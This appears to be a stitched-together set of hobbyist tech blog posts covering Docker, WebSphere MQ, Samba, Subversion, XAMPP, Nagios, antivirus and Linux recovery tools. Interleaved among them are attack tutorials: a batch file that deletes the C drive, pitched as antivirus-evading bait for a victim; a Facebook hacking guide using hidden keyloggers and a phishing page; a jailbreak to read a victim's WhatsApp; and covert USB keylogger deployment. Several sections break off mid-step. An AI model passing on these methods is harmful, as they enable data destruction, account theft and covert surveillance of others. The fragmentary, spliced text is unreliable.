What is Docker?

Lets face it, the now is Docker, even if this technology isn't very new, now that Docker is available and Open Source, the Application Development process and Infrastructure Architecture has changed.

BUT TELL ME, WHAT IS DOCKER!?

Let me put it this way, Docker is an Open Platform to SHIP, BUILD and Deploy applications.

The magic of this Platform, is that with Docker you can create containerized Applications that can run virtually on any host with Docker installed. This is an alternative to full machine virtualization like ESXi, KVM or XEN hypervisors.

In the following image, I explain how the Docker engine sits atop of a single host operating system. In contrast, with the traditional virtualization hypervisor mode, a separate guest operating system is needed for each virtual machine.

WHY USE DOCKER CONTAINERS!?

Well, first of all calm down, then breath and read this points:

Portable deployment across machines. Docker defines a format for bundling an application and all its dependencies into a single object which can be transferred to any docker-enabled machine, and executed there with the guarantee that the execution environment exposed to the application will be the same. Lxc implements process sandboxing, which is an important pre-requisite for portable deployment, but that alone is not enough for portable deployment. If you sent me a copy of your application installed in a custom lxc configuration, it would almost certainly not run on my machine the way it does on yours, because it is tied to your machine's specific configuration: networking, storage, logging, distro, etc. Docker defines an abstraction for these machine-specific settings, so that the exact same docker container can run - unchanged - on many different machines, with many different configurations.

Application-centric. Docker is optimized for the deployment of applications, as opposed to machines. This is reflected in its API, user interface, design philosophy and documentation. By contrast, the lxc helper scripts focus on containers as lightweight machines - basically servers that boot faster and need less ram. We think there's more to containers than just that.

Automatic build. Docker includes a tool for developers to automatically assemble a container from their source code, with full control over application dependencies, build tools, packaging etc. They are free to use make, maven, chef, puppet, salt, debian packages, rpms, source tarballs, or any combination of the above, regardless of the configuration of the machines.

Versioning. Docker includes git-like capabilities for tracking successive versions of a container, inspecting the diff between versions, committing new versions, rolling back etc. The history also includes how a container was assembled and by whom, so you get full traceability from the production server all the way back to the upstream developer. Docker also implements incremental uploads and downloads, similar to "git pull", so new versions of a container can be transferred by only sending diffs.

Component re-use. Any container can be used as an "base image" to create more specialized components. This can be done manually or as part of an automated build. For example you can prepare the ideal python environment, and use it as a base for 10 different applications. Your ideal postgresql setup can be re-used for all your future projects. And so on.

Sharing. Docker has access to a public registry (https://registry.hub.docker.com/) where thousands of people have uploaded useful containers: anything from redis, couchdb, postgres to irc bouncers to rails app servers to hadoop to base images for various distros. The registry also includes an official "standard library" of useful containers maintained by the docker team. The registry itself is open-source, so anyone can deploy their own registry to store and transfer private containers, for internal server deployments for example.

Tool ecosystem. Docker defines an API for automating and customizing the creation and deployment of containers. There are a huge number of tools integrating with docker to extend its capabilities. PaaS-like deployment (Dokku, Deis, Flynn), multi-node orchestration (maestro, salt, mesos, openstack nova), management dashboards (docker-ui, openstack horizon, shipyard), configuration management (chef, puppet), continuous integration (jenkins, strider, travis), etc. Docker is rapidly establishing itself as the standard for container-based tooling.

This manual will guide you on how to become anonymous while browsing the Web, there will always exist a way to track you down, so i'd suggest that if you are doing something that needs to be hidden, act differently while you are anonymous.

You can use it when you need to:

• Hide when attacking a website or scanning vulnerabilities.

HOW IT WORKS

TOR is already implemented on Tails Operating System, so you won't have to worry about

connecting to the TOR Network, Tails won't let you have any connection outside TOR node.

3rd Layer: VPN.

A VPN is an acronym for Virtual Private Network it is a server that is used to connect to a LAN securely. VPN's will encrypt your connection information and hide your real IP from websites, people and it will keep your connection encrypted so you won't be able to get traced.

5th Layer: SSH Tunneling

What is SSH and SSH Tunneling ?

SSH is the acronym for Secure Shell, it is an network protocol used to connect to Linux&Unix based machines. This will let you access the shell (Terminal) via a remote connection to the machine/server. The default port for SSH connection is 22.

SSH tunneling is using the SSH protocol to hook through the machine/server as you send a command through your internet, say loading Google, your machine will send the data through the "SSH Tunnel" and your IP will be hidden from the website. As your data is going through the "tunnel" it is encrypted using a Public-Key encryption.

6th Layer: MAC Address Spoofing.

MAC address is the acronym for Media Access Control address it's the unique identifier for a network interface. I like to think of it as the fingerprint of your connection.

MAC address spoofing is using a program (You can do it manually but program is much easier.) to change your MAC address so it doesn't leave behind your networks "fingerprint." Without doing this, you will never be FULLY anonymous.

Hello HaxorFans, today i'm writing this article on how to install Websphere MQ on a Linux server, i came with this decision after posting my MQ Introduction on LinkedIn and received some comments about

this Linux Installation.

Installing MQ can be a very easy task, but it is not only installation, some best practice configurations and Kernel performance tasks must be applied after installation.

The Software

Well first of all we need the MQ Software, you will have to buy a license or get a Free or Trial version of MQ, for more information, please visit: IBM WEBSPHERE MQ

After you get your MQ Software, please put the package you downloaded into /home/youruserid

youuserid refers to the id you use to login and extract it.

The Pre-Installation

Service Accounts:

Before we install WMQ we will need to create the user and group that we will use as Service Account for MQ.

Create Group: groupadd mqm

Create user: useradd -g mqm mqm

FileSystems:

We will need to create 2 mqm folders for MQ installation, one in /var and another in /opt.

Both will have to be owned by mqm group and have at least 500 MB each.

cd /opt/

mkdir mqm

chown -R mqm:mqm mqm

cd /var/

mkdir mqm

chown -R mqm:mqm mqm

The Installlation

First you will need to navigate to the extracted MQ folder you downloaded, and then run this command:

./mqlicense -accept

If you get a JRE Java Error, please use this commands:

./mqlicense -accept -jre PATH_TO_JRE

rpm -ivh MQSeriesServer-x.x.x-x.i386.rpm MQSeriesRuntime-x.x.x-x.i386.rpm

where x.x.x-x is the version number like 7.0.1-1

The Configuration

After the MQ has been installed we will need to configure some Kernel values for best performance.

Locate Files:

First step will be to locate the following files and create a Backup and if files don’t exist, create it.

/etc/sysctl.confback

cp /etc/sysctl.conf /etc/sysctl.confback

Command to create if non-existant

Touch /etc/sysctl.conf

/etc/security/limits.conf

Edit File:

If the file exists or it was created manually, please add the following lines:

Reload Config Files

In order to apply the changes we made on the above files we will need to run the following command:

sysctl -p

Rollback

In order to rollback, please run the following commands:

/etc/sysctl.confback

rm /etc/sysctl.conf

mv /etc/sysctl.confback /etc/sysctl.conf

/etc/security/limits.confback

rm /etc/security/limits.conf

mv/etc/security/limits.confback /etc/security/limits.conf

Today i was looking back into my old school hacking guides and files from 10 years back and i found some cool stuff, some of this cool stuff still works though, i think i'll be posting those methods and tools that still work, but this time i'll teach you how to create a file that destroys the C Drive.

This is a batch script that will delete all files in your C drive, this can be pretty effective if you did something wrong in a computer and maybe you don't have the time to cover all your tracks, you can just go ahead and create a file like this one and go home.

File Creation Steps.

1. Open Your Notepad
2. Copy and paste this:

@Echo off
Del C:\ *.* |y

3. Save your file as clear.bat
4. and in the File Type option, click on All Types.

Now you can execute the file by your own, or change the file name to something you know your Victim is going to execute, whenever he executes you will reach your goal, also its worth telling you that this file is untraceable by ANY antivirus since you are using built-in Operating System commands.

(Yes, this only applies in Windows.)

Hello everyone, i have been a MUD player since year 2000, this MUDS started around 1980's
becoming the first MMORPG's that existed, i must warn you that this games can be very addictive, more than any other graphic games though, this is because it is like reading a dynamic book in which you are the man character. another fact that makes you addict to this games is that you read it all, you create the world in your head as per the descriptions and the Non-Player-Characters in game.

The way to play this games is that you create a character or a RACE and CLASS, for example you can be a Human Warrior or an Elf Mage, after that you go through a beginners area and you learn how to move around the world, its pretty easy though, after that all characers have STATS, this stats are the way to meisure your abiilities, and you get the randomly, in some muds you have the choise to reroll your stats randomly to get different stats in your favor or the other way.

There are 2 ways to play MUDS, one can be being a PKILLER, which means you can kill other players in PKILL areas, there are some in game areas that are NONPKILL which means those are peacefull areas and the system wont let you attack a player, also you will be able to join a clan with other pk's.

In other hand we have NONPKILL players which are called Peaceful players, this kind of game is also cool since you will be able to explore the realms and create orders to explore in parties and help each other gather equipment, solve mazes or kill ancient monsters alltogether.

How to hack a Facebook Account

Hello everyone, this time I'm writing an article on how to hack a Facebook account, this sounds to be complicated but it is not, there are several ways to do it, i will focus on 2 ways which i think are really easy,

There are ZILLIONS of manuals on the net of how to do this by now, but this one is going to be cooler.

OK i am going to cover 2 hacking methods:

Keylogging
Phishing

Keylogging

This the easiest way to hack a facebook account, what this literally do is to save all keystrokes of a computer and send it to you. For this you need to send a file to your victim, it can be a photo poisoned with the keylogger and BOOM, Victim opens photo, you open the pandrora's box.

For this method there are 2 tools you can use, the first one is called WINSPY and can be downloaded from here: http://www.win-spy.com

There is another Keylogging software called Sniper Spy which can be downloaded from here:

NOTE: You can also try to look for any other Keylogger tool, those are easy to find and use.

Phishing

This method consists in creating a Fake Facebook login website and making your victim input their user and password on the fake website, when this happens the user and password will be saved in a file and the user will be redirected to facebook.com, they will think something went wrong and will retry to login to facebook again without any notice.

This is an easy method too but it requires more steps and more technical knowledge, but it should be easy if you follow my steps:

Now we need to create an account on 000WEBHOST in order to get a free hosting account and host our fake site, create the account, upload both files, Facebook.html and write.php and we are done, the address to that site will be the fake Facebook site, just send the link to that site to your victim and BOOM, you got their password. You can find the id and password in a log.txt file created in your 110 MB hosting folder.

Ok, so ill describe you how to do it in a very easy set of steps below, in order to do it succesfully i tried to hack it like 4 times, so i will give you the best practice to do it at the first time:

Backup your Device on iCloud.(iTunes)
Factory Reset your iPhone on iTunes.

Disable the Lock Passcode before launching the Evasi0n Software.
Connect your Phone to the Computer, launch evasion and click on Jailbreak
Dont use iTunes or open any APP on your device while you use Evasi0n

7. After you complete this steps youll be able to get your victims Whatsapp messages and receive them too.

Hello everybody, im writing this article since im working for a banking company that uses this middleware software to transfer messages between servers, this messages can be transactions or maybe DB info that needs to be gathered from a Database server and displayed on an application isolated from that database.

IBM's Websphere MQ is a middle-ware application that allows two applications to pass messages back and forth without having to integrate with each-other directly. Websphere MQ is a fairly popular application in the enterprise especially for those running many java based programs.
Today's article is a copy of my personal Websphere MQ cheat sheet. This cheat sheet is geared more from a System Administrators prospective and doesn't touch much on creating or altering queues or channels, but should provide a good head start for those who need to just get something restarted.
This cheat sheet is split into two parts, the first being the Linux command line based commands and the second being the MQ CLI based commands.
Where the command starts with REPLACE will require replacing the information with information from your system

all the below commands should be ran with the MQM user to have the appropiate priviledges, also if you need more information regarding any command please use the IBM's Documentation.

Step 1: You Will Need...

For this guide you will need a few things first:

· A cheap memory stick / USB flash drive (any capacity)

· Shadow Keylogger (free) which you can download free from here

· The computer you want to record (i.e, your own)

Step 2: A Few More Things Before We Start...

You will also need to ensure that the computer you want to record:

· Is running some version of Windows (this will not work on Mac or Linux)

· Has the .NET Framework 2.0 or later (almost all do, but if not you can download free from here)

Step 3: Download Shadow Keylogger

We will need to set things up on the USB Flash Drive first, so on another computer, plug in your Flash Drive and open it through 'My Computer' or it may pop up a small window automatically. Leave this window open.

Now, download the keylogger from this link. This will download a .ZIP folder, which you will need to open. Inside the folder there will be a file called'sk.exe', this is the keylogger program.

Click on the program and drag it across into your USB Flash Drive. Once it has been copied, you can close the .ZIP folder.

Step 4: Create an Automatic Setup File

Although the program will run fine at the moment, when you open Shadow Keylogger, you will have to create a password in order to start recording. However, this will take a little bit of time, which you may not have. So Shadow Keylogger has a clever feature where you can tell it to run automatically with a few pre-defined settings. For a full guide on how to create one of these files, you can watch our YouTube video.

In this guide, I will show you how you can configure it to start recording automatically. Open Notepad, or any other half-decent text editor, thencopy this block of XML and paste it into your document:

I have highlighted the password bit above, since this is where you enter your own password. You will need to remember the password you chose, because after you have finished recording, you need to type it on the keyboard to see all of the recorded keystrokes.

For this guide, you don't need to change any of the other values.

Lastly, click 'Save As' and navigate to the USB Flash Drive and make sure it is in exactly the same folder as the program (sk.exe). Save the file as'config.xml' (without the quotation marks) and make sure the dropdown menu is changed to 'All Files', and not 'Text files'. Then hit 'Save'!

Step 5: Now Try It!

You're done! Now, just pull the USB Flash Drive out of your computer. Approach the target computer, plug the USB Flash Drive in any available port.

On some computers, it may open the drive folder automatically, on others it may have a small prompt box, where you need to click on the 'Open Files and Folders' option. In a handful of cases, you may even need to open 'My Computer'.

When the drive folder opens, just double-click on the 'sk.exe', or click it and hit enter.

Shadow Keylogger will open immediately, realise you've already given it a password, and just start recording automatically.

You can then immediately pull out your USB Flash Drive from the computer. The folder will close automatically, and you can walk away.

Return later (for this particular setup, it has to be before the user shuts the computer down) and simply type your password onto the keyboard, it doesn't matter where.

The results window will then appear with all of the recorded keystrokes.

How To: Turn Old computer into a File-Share Server

First things first, we’ll need to install Samba on the to-be server.

sudo apt-get install samba

Once that’s complete, we’ll edit the system-wide Samba configuration to set up a new “share”. Run in a terminal:

sudo gedit /etc/samba/smb.conf

This’ll open a lengthy text file, where you can use the following template to create a simple Samba share to append (replacing the values with your own, of course) and save.

comment = An optional description of your share.

path = /home/example/directory

browseable = yes

read only = no

guest ok = yes

guest only = yes

Just a brief explanation of these options:

comment: a short (human-readable) description of your share, e.g. “My Share”.

path: the location of the folder you want to share, for example /home/yourname/Music.

browseable: whether the share location will be able to be browsed remotely.

read only: setting to “yes” means computers accessing the share cannot create/delete files.

guest ok: “yes” here means that computers can access this share without requiring a username or password.

guest only: this is optional, if ”yes” allows only guest access, i.e. no user login.

Of course, this is a configuration for a simple public share –public, as in anyone on the same network as would have access.

Also, do not edit any other elements of the config file unless you know what you’re doing.

Now after a reboot, your Samba share ought to be up and running.
Connecting to Your New Server

In your favourite file manager you can access the server by browsing your local network –from the sidebar in Nautilus, for example– which would show all devices, including your newly created server, that are connected.
Alternatively in the location bar of your file browser you can enter the network address of the server:

This article covers installing subversion with the apache module so that it can be easily accessed from other systems on a public network. If you want a more secure svn server, you could use svnserve+ssh, which isn’t covered in this article.

To install subversion, open a terminal and run the following command:

sudo apt-get install subversion libapache2-svn

We’re going to create the subversion repository in /svn, although you should choose a location that has a good amount of space.

sudo svnadmin create /svn

Next we’ll need to edit the configuration file for the subversion webdav module. You can use a different editor if you’d like.

sudo gedit /etc/apache2/mods-enabled/dav_svn.conf

The Location element in the configuration file dictates the root directory where subversion will be acessible from, for instance: http://www.server.com/svn

The DAV line needs to be uncommented to enable the dav module

The SVNPath line should be set to the same place your created the repository with the svnadmin command.

If you want to force all users to authenticate even for read access, add the following line right below the AuthUserFile line from above. Restart apache after changing this line.

Require valid-user

Now if you refresh your browser, you’ll be prompted for your credentials:

Backing up your database is a very important system administration task, and should generally be run from a cron job at scheduled intervals. We will use the mysqldump utility included with mysql to dump the contents of the database to a text file that can be easily re-imported.

Syntax:

Example:

This will give you a text file containing all the commands required to recreate the database.

Turn a Flash Drive Into a Portable Web Server

Portable applications are very useful for getting work done on the go, but how about portable servers? Here’s how you can turn your flash drive into a portable web server.

To put a full web server on our flash drive, we’re going to use XAMPP Lite. This lightweight, preconfigured server includes recent versions of Apache, MySQL, and PHP so you can run most websites and webapps directly from it. You could use the full XAMPP, which includes more features such as a FileZilla FTP server and OpenSSL, but for most purposes, the light version is plenty for a portable server.

Download the latest version of XAMPP Lite (link below). In this tutorial, we used the self-extracting EXE version; you could choose the ZIP file and extract the files yourself, but we found it easier to use the executable.

Run the installer, and click Browse choose where to install your server.

Select your flash drive, or a folder in it, and click Ok. Make sure your flash drive has at least 250MB of available storage space. XAMPP will create an xampplite folder and store all the files in it during the installation.

Click Install, and all of the files will be extracted to your flash drive. This may take a few moments depending on your flash drive’s speed.

When the extraction process is finished, a Command Prompt window will open to finish the installation. The first prompt will ask if you want to add shortcuts to the start menu and desktop; enter “n” since we don’t want to create start menu links to our portable server.

Now enter “y” to configure XAMPP’s directories automatically.

Finally, enter “y” to make XAMPP fully portable. It will set up the servers to run without specific drive letters so your server will run from any computer.

XAMPP will finalize your changes; press Enter when everything is completed.

Setup will automatically launch the command line version of XAMPP. On first run, confirm that your time zone is correct.

And that’s it! You can now run XAMPP’s control panel by entering 1, or you can exit and run XAMPP from any other computer with your flash drive.

To complete your portable webserver kit, you may want to install Portable Firefox or Iron Browser on your flash drive so you always have your favorite browser ready to use.

Running your portable server

Using your portable server is very simple. Open the xampplite folder on your flash drive and launch xampp-control.exe.

Click Start beside Apache and MySql to get your webserver running.

Please note: Do not check the Svc box, as this will run the server as a Windows service. To keep XAMPP portable, you do not want it running as a service!

Windows Firewall may prompt you that it blocked the server; click Allow access to let your server run.

Once they’re running, you can click Admin to open the default XAMPP admin page running from your local webserver. Or, you can view it by browsing to http://localhost/ orhttp://127.0.0.1/ in your browser.

If everything is working correctly, you should see this page in your browser. Choose your default language…

And then you’ll see the default XAMPP admin page.

Click the Status link on the left sidebar to make sure everything is running correctly.

If you click the Admin button for MySql in the XAMPP Control Panel, it will open phpMyAdmin in your default browser. Alternately, you can open the MySql admin page by enteringhttp://localhost/phpmyadmin/ or http://127.0.0.1/phpmyadmin/ in your favorite browser.

Now you can add your own webpages to your webserver. Save all of your web files in the \xampplight\htdocs\ folder on your flash drive.

Install WordPress in your portable server

Since XAMPP Lite includes MySql and PHP, you can even run webapps such as WordPress, the popular CMS and blogging platform. Download WordPress (link below), and extract the files to the \xampplite\htdocs folder on your flash drive.

Now all of the WordPress files are stored in \xampplite\htdocs\wordpress on your flash drive.

We still need to setup WordPress on our portable server. Open your MySql admin pagehttp://localhost/phpmyadmin/ to create a new database for WordPress. Enter a name for your database in the “Create new database” box, and click Create.

Click the Privileges tab on the top, and the select “Add a new User”.

Enter a username and password for the database, and then click the Go button on the bottom of the page.

Using WordPress

Now, in your browser, enter http://localhost/wordpress/wp-admin/install.php. Click Create a Configuration File to continue.

Make sure you have your Database name, username, and password we created previously, and click “Let’s Go!”

Enter your WordPress database name, username, and password, leave the other two entries as default, and click Submit.

You should now have the database all ready to go. Click “Run the install” to finish installing WordPress.

Enter a title, username, and password for your test blog, as well as your email address, and then click “Install WordPress”.

You now have a portable install of WordPress. Click “Log In” to access your WordPress admin page. Enter your username and password, and click Log In.

Here you can add pages, posts, themes, extensions, and anything else just like you would on a normal WordPress site. This is a great way to experiment with WordPress without messing up your real website.

You can view your portable WordPress site by entering http://localhost/wordpress/ in your address bar.

Closing your server

When you’re done running your test server, click the Stop button on each of the services and then click the Exit button in the XAMPP control panel. If you press the exit button on the top of the window, it will just minimize the control panel to the tray.

Alternately, you can shutdown your server by running xampp_stop.exe from your xampplite folder.

Conclusion

XAMPP Lite gives you a great way to run a full webserver directly from your flash drive. Now, anywhere you go, you can test and tweak your webpages and webapps from any Windows computer.

How to: Monitor SQL with Nagios

First, in each database server I created a user nagios and set a password for that user. I then
created a set of keys:

ssh-keygen -t dsa

I set no passphrase for the key, since I intended it to have a single purpose and limited
access to the database servers. I then tested the access to see if there were any glitches.
It worked on one server but not the other. After a quick once over, I decided to proceed and
solve that problem later. Since I needed check_mysql I compiled the plugins

From the nagios plugins web site, I downloaded nagios-plugins-1.4.14.tar.gz to each of the
database servers. However, because not all the necessary mysql packages were in place, it
threw some errors during the configure stage.

./configure –with-nagios-user=nagios –with-nagios-group=nagios –with-mysql=/usr

The main error that interfered with my plans was the failure to build the check_mysql plugin.
After some research I discovered that the failure was probably due to the absence of some
mysql libraries that would be in a development package. However, RHEL5 doesn’t have such a
package in their repository for RHEL5. It is available in some of the alternate repositories. It’s not really that surprising, when I think about it, that the package is unavailable, RHEL isn’t intended to be a development platform, it’s a server platform. I didn’t want to add alternate repositories without permission from the client.

So I went for plan B. I decided to configure the check-mysql to run on the monitor server
and attach to the mysql database over the network. There is a danger that If not carefully configured this could represent a security vulnerability for the database server. To make it as secure as possible
I logged into mysql on each of the database servers and created special access rules for this
purpose. I created a special nagios user with it’s own password and gave it read only permissions
and only on one database.

grant select on database.* to nagios@monitor identified by “password”

Now the user nagios can read that database. It doesn’t have any more privileges, so it’s unlikely to be used to damage the database, even if the monitor were compromised. The bad guys won’t
be able to use the compromise of the monitor to also compromise or damage the database server.

To test my work I issued the following command:

/usr/local/nagios/libexec/check_mysql -d database -u nagios -p password -H $HOSTNAME$

$HOSTNAME is the ip of the database server.
The data came back:

Antivirus Software is a MUST nowdays, you just cannot have a PC running WIndows without one, i know some of them are expensive as hell but nowdays we have some pretty nice free Antivirus options, and let me tell you that just having an antivirus means you can lay down and be happy, no SIR!

You have to keep it up to date, make weekly scans at least and keep avoiding those suspicious sites.

AVG Anti-Virus Free Edition

AVG Anti-Virus Free Edition is an excellent choice, if not the best for a free antivirus. AVG Anti-Virus Free is a full-fledged antivirus and anti-spyware tool, includes an email scanner, link scanner, scheduled scanning options, automatic updates, and more. AVG has been certified to remove 100% of in-the-wild viruses

Cons: Unfortunately AVG free has grown considerably in size, has very slow scan speeds and advertisements (but they can be disabled). AVG Free Edition does not provide adware/spyware removal (though it is available in the paid version of the product).

Avast! Free

Avast! Free Antivirus is improving its detection rates over the past few years ”heuristics engine” and now ranks with the some of the best. Avast has the following features: full real-time capabilities including web, e-mail, IM, P2P and network shields, boot-time scanning, and a behavioral blocker. This program is also very light on resources.AVAST has been making this antivirus product since 1988 and is often cited as the most installed antivirus product. It also has a large user support community in case you need any help.

Cons: Average scores in PCMag’s malware blocking test.

Microsoft Security Essentials

Microsoft Security Essentials is a another fan favorite with great detection rates, particularly for rootkits. Microsoft Security Essentials has very few false positives, is light on resources and is good at removal of existing malware. MSE is a great choice for average users because of the minimal user interaction required. It is directly from Microsoft and it’s very easy to see if your computer is secure from threats: if the icon next to your clock is green, you’re in good; if it’s red, something is wrong.

Cons: The main downsides are the slow scan speeds and the lengthy amount of time it takes to quarantine malware.

Panda Cloud Antivirus

Panda Cloud Antivirus protects you from several kinds of malware threats – viruses, worms, Trojans, adware, and more – just like all the other free antivirus programs in this list. Along with Microsoft Security Essentials, it is an excellent choice for average users with a simple interface and completely automated features with automatic updating and removal of malware. What makes Panda Cloud Antivirus one of the top free antivirus programs is that it does its job from “the cloud” meaning the antivirus work that typically slows down a computer is done on computers elsewhere on the Internet, freeing up your computer to work like nothing is happening.

Cons: As many free program installs Panda Cloud Antivirus tries to install a toolbar and set Yahoo! as your browser’s home page during the installation process so uncheck the boxes before continuing if you don’t want them.

Avira AntiVir Personal Edition

Avira AntiVir Personal Edition protects you from viruses, Trojans, worms, spyware, adware, and various other kinds of malware, making it a fully functional anti-malware tool. AntiVir does not include web or e-mail scanning capabilities; this is only available in the paid version.

On installation, AntiVir schedules a daily full scan. You can, of course, change the schedule or add your own scheduled events. By default its configuration page shows only basic settings.

Cons: One con about Avira AntiVir Personal was the configuration you have to complete after installation which might be difficult if you’re a computer novice.

10 tools to recover deleted files on Linux

Some distros of Linux has recycle bin such as Ubuntu which you can restore but for the majority and deleting via command-line, the deleted files seem to disappear forever and without any trace that it ever existed.
In this article, I’ve put together list of techniques and tools that can do file/directory recovery on Linux platform. But before I start listing the tools, a few common sense techniques which can make it a bit harder to delete files on your system.
For example, change rm to alias=’rm -i’. This way, every time you delete a file, the system will ask if you’re sure. Second thing is simply to do backups. If you don’t have tape, use a utility like rsync to copy the important directories and files to another system or partition. You can set a crontab to do this daily or even hourly. Makes restoring so much easier in case you delete something by mistake.

Recover – automates some steps as described in the Ext2fs-Undeletion-howto in order to recover a lost file. This utility will greatly increase your file recover rate. People who do not know how to undelete a file are encouraged to use this utility.

athena-delete – was written at Project Athena in response to the problem which many novice UNIX users have with accidentally deleting files they didn’t want to delete.

unrm – a small shell utility which can, under some circumstances, recover almost 99% of your erased data (similar to DOS’s undelete). Read carefully the FAQ file and preferably theLinux Ext2fs Undeletion Mini-HOWTO before using it.

gET iT i sAY – a file recovery tool for Ext2/Ext3 filesystems. Once installed, current files and newly created files from /root and /home are recovered. It allows users to recover all deleted files, recover files owned by a specific user, dump data from old file locations, and recover files of a specific type, such as text or MP3. A forensic analyzer is also provided to assist users during recovery.

e2undel – an interactive console tool that recovers the data of deleted files on an ext2 file system under Linux. A library that allows you to recover deleted files by name is included. e2undel does not manipulate any internal ext2 structures, and it does not require any additional tools. It should be useable without knowledge of the ext2 internal.

anyfs-tools – allows you to recover and convert filesystems while using minimal extra disk space. Unlike other recovery tools, anyfs-tools doesn’t copy all the files found on other disks (or partitions), but only saves information about the location of the file blocks to an external inode table. After recovery, a user may mount the damaged filesystem with anyfs and the external inode table and then interact with all recovered files with any program.

rfs – a shell script for creating and updating a local spare system disk. The main goal is to recover a working system after a crash quickly. In this case, “quickly” means the time it takes to reboot the machine. rfs stands for “replication of filesystems”. Like rsyncbackup, rfs is built on top of rsync.

e2retrieve - an Ext2 data recovery tool that works on truncated or partial filesystems. It is very useful to retrieve data when a disk from an LVM crashes. It does not repair the filesystem but extracts and copies most of the data it can from raw Ext2 data given to it.

findfile – a collection of tools for recovering files from filesystems with corrupted directories, allocation tables, etc. This can be useful when the partition table (or more) of a hard disk is corrupted, or when you have a memory card of a digital camera which is corrupted.

TestDisk – a tool to check and undelete partitions. It works with the following partitions: FAT12, FAT16, FAT32, Linux, Linux swap (version 1 and 2), NTFS (Windows NT/W2K/2003), BeFS (BeOS), UFS (BSD), JFS, XFS, and Netware.

Some of these tools are old but can still be useful.

How to: find out how much RAM is installed in Ubuntu

You may find yourself struggling to remember how much RAM you have at your disposal, or just wondering how much is being recognised by Ubuntu. This tutorial details ways to find out.

Open System Info.

This can be done either in the dash, or by going to the gear icon (top right),
opening System Settings,
and opening System Info.

Under the Ubuntu Logo and Version Number, it will state:Memory 2.8GiB.

In this instance, 3GB is installed, but 2.8 is recognised because they are a 2GB and 1GB module (stick).
In some cases, there may be overlap such as this.
